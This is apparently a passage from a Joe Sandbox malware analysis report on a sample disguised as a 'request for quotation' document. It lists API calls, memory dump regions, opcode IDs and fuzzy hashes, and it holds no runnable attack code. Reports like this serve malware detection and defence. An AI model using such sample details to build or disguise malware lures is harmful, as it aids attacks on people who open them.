                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                              • Opcode ID: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                                                                                                                                                                                              • Instruction ID: b26529ee9b914c12feaffd8856b12b4ff76ce3a38eeed91d3c5b717ccaf7fb48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7b9d5836668f83c2a3f51eb8053bbd8b90c3f0a49dd782c3ce1182c41f61193
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E01DFB9300902AFC301EB29D441D26F7A9FF8A314714812EE818C7702DB38EC21CBE4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                              • Opcode ID: 9c32f161398eb4bd7e122dfe5082f696bb269761549320fc01a7a53078dc7b67
                                                                                                                                                                                                                              • Instruction ID: 8ac4692a4edd8b950221785d74b091900f33ceedfbe0b692f8040025a9c6a4da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c32f161398eb4bd7e122dfe5082f696bb269761549320fc01a7a53078dc7b67
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E90126B26013016EC3209F29D806FA7BBD4AB04360F10853FF61ACA1D1EA79F84087D8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                              • Opcode ID: ad76dab04f2f54abdb2e3571ea1dc09999a209a42157367896a55cadce46be18
                                                                                                                                                                                                                              • Instruction ID: 0418ca6a570d9a8215c129544c9ff2dc03d6f413d78be1ca0089e14832ea6f7a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad76dab04f2f54abdb2e3571ea1dc09999a209a42157367896a55cadce46be18
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12018071C0D3D09FC7268B3794142767BB46B777A4F098E9AA0859B1A2D6709C04D752
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __lock_file.LIBCMT ref: 004248A6
                                                                                                                                                                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __getptd_noexit__lock_file
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2597487223-0
                                                                                                                                                                                                                              • Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                                                                                              • Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                                                                                              • Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongNamePath_memmove
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2514874351-0
                                                                                                                                                                                                                              • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                                                                                              • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                                              • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                                                                                              • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                              • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                                                                                                                                                                                              • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __wfsopen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 197181222-0
                                                                                                                                                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                                                                              • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: a922e54199d856f66316b9f49874a2140691105f4103837f0a19e123fae390fb
                                                                                                                                                                                                                              • Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a922e54199d856f66316b9f49874a2140691105f4103837f0a19e123fae390fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                              • Instruction ID: 479e2336f77f0c923a1e269993c813691999c3575b2be49809fbf4bf1bd49319
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79E09A7494010DAFDB00DFA4D54969D7BB4EF04311F1005A1FD0596680DA309A548A62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                              • Instruction ID: ccc4bebb080a3822cd70ceded2b6deae3eb62360e421e6ac52810c6889dc5961
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0E67494010DEFDB00DFB4D54D69D7BB4EF04301F100161FD01D2280D6309D50CA62
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                                                                                                                                                                              • SendMessageW.USER32 ref: 0048CC29
                                                                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 0048CC95
                                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                                                                                                                                                                              • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                                                                                                                                                                              • SendMessageW.USER32 ref: 0048CD33
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                                                                                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                                                                                                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                                                                                                                                                                              • SetCapture.USER32(?), ref: 0048CE69
                                                                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                                                                                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                                                                                                                                                                              • ReleaseCapture.USER32 ref: 0048CF00
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                                                                                                                                                                              • SendMessageW.USER32 ref: 0048CFD1
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                                                                                                                                                                              • SendMessageW.USER32 ref: 0048D03D
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0048D08D
                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 0048D0BA
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                                                                                                                                                                              • SendMessageW.USER32 ref: 0048D154
                                                                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                                                                                                                                                                              • SendMessageW.USER32 ref: 0048D22F
                                                                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                                                                                                                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                              • String ID: @GUI_DRAGID$F$pbL
                                                                                                                                                                                                                              • API String ID: 3977979337-2097280626
                                                                                                                                                                                                                              • Opcode ID: 230c309e01b64dd526e4eceab0149aa8d8b99525a36798e8d5036c65b1638749
                                                                                                                                                                                                                              • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 230c309e01b64dd526e4eceab0149aa8d8b99525a36798e8d5036c65b1638749
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memmove$_memset
